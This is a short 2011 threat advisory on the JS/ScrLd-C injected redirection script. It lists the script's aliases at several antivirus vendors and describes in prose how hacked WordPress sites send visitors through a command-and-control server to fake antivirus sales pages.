For the week of
24 Jan 2011
Users at Risk:
Also Known As:
- Avira: JS/Clicker.CA
- Kaspersky: Trojan-Clicker.JS.Agent.ma
- McAfee: JS/Wonka
- Microsoft: TrojanClicker:HTML/Iframe.J
- Trend Micro: JS_WONKA.SM
The purpose of the injected script is redirection. The scripts load a second script from a remote command-and-control (C&C) server, and—based on those contents—attempts to redirect the visitor to a payload site. This enables the final payload site to be changed at the 1st level command-and-control without the need to change every hacked site. The referrer and keyword parameters are passed through from the injected site to allow the hackers to track how the victims arrive at the payload site.
JS/ScrLd-C is a general-purpose script used in web-based attacks, but has been mostly used by hackers who have broken into sites running Wordpress and are using it to redirect innocent users to sites selling fake anti-virus software.